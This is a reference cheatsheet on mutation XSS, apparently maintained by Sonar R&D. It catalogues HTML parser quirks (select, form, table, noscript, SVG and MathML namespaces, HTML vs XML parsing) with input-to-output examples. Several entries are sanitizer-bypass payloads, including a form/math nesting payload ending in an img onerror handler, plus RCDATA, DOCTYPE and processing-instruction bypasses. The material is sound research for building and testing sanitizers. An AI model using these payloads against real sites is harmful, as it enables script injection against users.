mXSS cheatsheet 🧬🔬

This cheatsheet is your one-stop shop for diving deep into the fascinating world of mXSS (mutations caused by browser quirks in HTML parsing). Forget sifting through the official 1500~ page spec – here’s a curated list of examples that showcase these unexpected behaviors.

What’s in it for you?

If you would like to know more on this topic, you can visit:

Contributing

Contributions to this list are very welcome. Feel free to open issues on the repository if you would like to see more information on a specific topic, or a pull request if you are already aware of additional information. Links to public write-ups are appreciated when adding info.

The project is maintained by the Sonar R&D team. Find XSS in your code (and much more) with SonarCloud, free for open-source projects!

HTML namespace

select

  • Unwanted elements in select will get deleted, <select><a> → <select>
  • Aside from <select>, <input>, <keygen> and <textarea>: <select><style><input><a> → <select></select><input><a></a>

form

  • Cant have other form descendants, <form id=form1>INSIDE_FORM1<form id=form2>INSIDE_FORM2 → <form id="form1">INSIDE_FORM1 INSIDE_FORM2</form>
  • Bypass, <form id="outer"><div></form><form id="inner"><input> → <form id="outer"><div><form id="inner"><input></form></div></form> → <form id="outer"><div><input></div></form>
  • Can craft payloads that will mutate even after the second reparsing: <form id="outer"><math><mtext></form><form id="inner"><mglyph><svg><mtext><form id="outer"><mi></form><form id="inner"><mglyph><desc><xmp><img src=x onerror=alert(1)>

table

  • Will move disallowed elements before, <table><a> → <a></a><table></table>
  • Can be used to enclose disallowed elements in one another
    • <p><table><xmp> → <p><xmp></xmp><table></table></p> → <p></p><xmp></xmp><table></table>
    • <a><mglyph><table><a> → <a><mglyph><a></a><table></table></mglyph></a> → <a><mglyph></mglyph><a></a><table></table></a>
    • <p><table><ul> → <p><ul></ul><table></table></p> → <p></p><ul></ul><table></table><p></p>
    • And more…
  • Table elements such as tbody, tr,and td will be removed outside of the table

a

  • Cannot be the child of another a element. Bypass via table element: <a id=1><table><a id=2> → <a id="1"><a id="2"></a><table></table></a> → <a id="1"></a><a id="2"></a><table></table>
  • Also <a id=1><audio>aa<altglyphdef><animatecolor><filter><fieldset><a id=2></fieldset></a>

headings

  • Headers cant be direct childs e.g: <h1><h2> → <h1></h1><h2></h2>
  • Bypass, <h1><a><h2></a> → <h1><a></a><h2><a></a></h2></h1> → <h1><a></a></h1><h2><a></a></h2>

noscript

  • Parsed differently when js is enabled or disabled. When parsing via DOMParser scripting is disabled
  • Js enabled, <noscript><a> → <noscript><a></noscript>
  • Js disabled, <noscript><a> → <noscript><a></a></noscript>

br and p

  • Are the only elements that can be created with an end tag, </p> → <p></p>
  • Elements that end a p element: address, article, aside, blockquote, center, details, dialog, dir, div, dl, fieldset, figcaption, figure, footer, header, hgroup, main, menu, nav, ol, p, search, section, summary, ul, pre, listing, plaintext

plaintext

  • plaintext can’t be closed in HTML namespace but <table><plaintext><a> → <plaintext><a></plaintext><table></table> table will execute

textarea

  • Content will get decoded
  • Comments will not be parsed in textarea: <textarea><!-- test -> → <textarea> &lt;!--test--&gt;</textarea>

Active formatting elements

  • List of elements: a, b, big, code, em, font, i, nobr, s, small, strike, strong, tt, and u
  • Active formatting elements might get duplicated during parsing roundtrips when the DOM tree changes - the-list-of-active-formatting-elements
  • For example: <li><a><table><li>t → <li><a><li>t</li><table></table></a></li> → <li><a></a></li><li><a>t</a></li><table></table>

NULL byte

  • Will change to chr at 65533 in an element name
    a=new window.DOMParser().parseFromString(`<a\x00 id="test">`,"text/html");
    a.querySelector(`#test`).tagName.substr(1).charCodeAt() == 65533;
    >>> true
    


SVG namespace

HTML integration points

  • foreignObject, desc, and title elements

image element

  • image is allowed in svg but in HTML it will change to img, which is a foreign content breaker


MATHML namespace

HTML integration points

  • mi, mo, mn, ms, and mtext elements

annotation-xml element

  • Can embed SVG namespace in MathML only if it’s a direct descendant of annotation-xml, or in an HTML integration point: <math><annotation-xml><svg> But not <math><annotation-xml><x><svg>
  • Can be a text integration point if the encoding attribute is set to text/html

mglyph/malignmark elements

  • If either one of the mglyph or malignmark tags is a direct descendant of HTML integration point, the element (and its descendant) will be in MATHML namespace


Foreign content breakers

The following tags

  • b, big, blockquote, body, br, center, code, dd, div, dl, dt, em, embed, h1, h2, h3, h4, h5, h6, head, hr, i, img, li, listing, menu, meta, nobr, ol, p, pre, ruby, s, small, span, strong, strike, sub, sup, table, tt, u, ul, var

The font element

  • Is considered “Breaking foreign content tags” only with one of the attributes named color, face, or size

The head and body element

  • Are also content breakers and disappear when rendering in the body, e.g.: <svg><body><a> → <svg></svg><a></a>


Browser specific

Document fragment parsing

  • JavaScript functions that use fragment parsing innerHTML, insertAdjacentHTML, etc.
  • Non-fragment parsing examples iframe’s srcdoc, document rendering
  • Firefox <svg><div> → <svg><div></div></svg> (not only div but rather all breaking foreign content elements)
  • Others <svg><div> → <svg></svg><div></div> (same expected)


HTML5 vs HTML4 / XML

RCDATA/RAWTEXT elements

  • HTML introduced RCDATA/RAWTEXT type elements meaning if the sanitizer is using XML style parser, an attacker can use payload as such to bypass the sanitization <noframes><style></noframes><xss></style></noframes>

Comments

  • According to the XML specification (XHTML), comments must end with the characters —>. On the other hand, the HTML specification states that a comment’s text “must not start with the string >, nor start with the string ->”.
    Input: <!--><p>
    HTML5 output: <!----><p></p>
    HTML4 output: <!--><p>-->
    

    This can be done with either <!--> or <!--->.

Foreign content elements

  • HTML5 introduced two foreign elements (math and svg) which follow different parsing specifications than HTML. Again parsing with PHP doesn’t take it into account, causing other parsing differentials and sanitizers bypass such as: <svg><p><style><!--</style><xss>--></style>

DOCTYPE element

  • The !DOCTYPE element in XML/XHTML is more complex allowing more characters and element nesting than in HTML5. In contrast, the HTML doctype ends with the first occurrence of the “greater than” sign >. The following payload can be used if the parser doesn’t follow HTML5’s DOCTYPE rules:
    <!DOCTYPE HTML PUBLIC "-//W3C//DTDHTML4.01//EN" "><xss>">
    <!DOCTYPE HTML SYSTEM "><xss>">
    

Element name starting with underscrool

  • According to the XML specification “Element names must start with a letter or underscore”, unlike HTML where tags must start with ASCII alphanumerics.
    Input: <p><_test>/<p>
    HTML output: <p>&lt;_test/&gt;/<p>
    XML output: <p><_test/>/<p>
    

Processing instruction

  • XML has implemented Processing Instruction while HTML will create a comment if ? follows an open tag chr <. The following payload can be used: <?x --><xss> ?> if the sanitizer accepts PI.


Entities decoding

In the content of noscript

In the content of style only in svg/mathML namespaces


Documentation links

Integration points: HTML Standard

Breaking foreign content tags: HTML Standard

RCDATA/RAWTEXT elements: HTML Standard

Serializing HTML fragments: HTML Standard

Element types: HTML Standard